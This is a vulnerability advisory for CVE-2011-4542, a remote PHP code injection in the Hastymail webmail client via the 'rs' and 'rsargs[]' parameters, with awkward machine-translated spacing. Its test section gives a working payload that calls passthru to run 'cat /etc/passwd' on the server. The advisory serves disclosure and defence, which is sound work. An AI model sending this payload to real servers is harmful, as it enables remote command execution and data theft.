Hastymail "rs" and "rsargs []" Parameter Remote Code Injection Vulnerability

Release date: 2011-11-23
Updated on: 2011-11-28

Affected Systems:
Hastymail
Description:
--------------------------------------------------------------------------------
Bugtraq id: 50794
Cve id: CVE-2011-4542

Hastymail is a fast, secure, RFC-compatible, cross-platform IMAP/SMTP client application written in PHP.

The input verification vulnerability exists in Hastymail implementation. The tampered $ _ POST ['rs '] and $ _ POST ['rsargs []'] input parameters are not correctly checked and filtered, attackers can exploit these vulnerabilities to inject and execute arbitrary code, causing the Web server to execute arbitrary PHP code, leak sensitive information, and delete arbitrary files.

<* Source: BTeixeira

Link: https://www.dognaedis.com/vulns/DGS-SEC-3.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

GET :/? Page = mailbox & mailbox = Drafts "> http: // <app_base> /? Page = mailbox & mailbox = Drafts
POST: rs = passthru & rsargs [] = asd & rsargs [] = cat/etc/passwd

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Hastymail
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://hastymail.sourceforge.net/index.php